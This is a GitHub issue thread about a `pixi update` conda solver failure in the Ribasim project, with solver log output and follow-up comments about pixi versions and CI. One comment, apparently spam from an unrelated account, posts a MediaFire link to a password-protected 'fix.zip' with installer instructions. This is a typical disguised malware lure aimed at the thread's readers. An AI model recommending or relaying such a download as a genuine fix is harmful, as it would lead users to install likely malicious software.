### ISSUE TITLE
Running `pixi update` results in an error. No candidates were found for build *

### ISSUE THREAD

**Issue by deltamarnix** [Deltares/Ribasim#1763]
Run `pixi update` with pixi 0.27.1 or higher.
You will get an error:

>   ⠁ py312:win-64         [00:00:03] resolving conda
>   ⠉ py312:osx-64         [00:00:03] [━━━━━━━━━━━━━━━━━━━━] 30.96 MiB @ 9.35 MiB/s downloading repodata
>   ⠉ py311:win-64         [00:00:03] resolving conda
>   ⠉ py311:osx-64         [00:00:03] loading repodata
>   ⠉ py311:osx-arm64      [00:00:03] resolving conda
>   ⠉ py311:linux-64       [00:00:03] resolving conda
>   ⠉ py312:linux-64       [00:00:03] resolving conda
>   ⠉ py310:osx-64         [00:00:03] loading repodata
>   ⠁ py310:linux-64       [00:00:03] resolving conda
>   ⠁ py310:osx-arm64      [00:00:03] resolving conda
>   ⠁ py310:win-64         [00:00:03] resolving conda                                                                       x failed to solve the conda requirements of 'py312' 'osx-arm64'
>   `-> Cannot solve the request because of: No candidates were found for build *.

This will break in a couple of days on the CI when the monthly update happens.

**Comment by nxllxvxxd** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by visr** [comment]
Have you tried with pixi 0.28.1?

**Comment by deltamarnix** [comment]
Failing on CI as expected with 0.28.1: https://github.com/Deltares/Ribasim/actions/runs/10562702115/job/29261252431
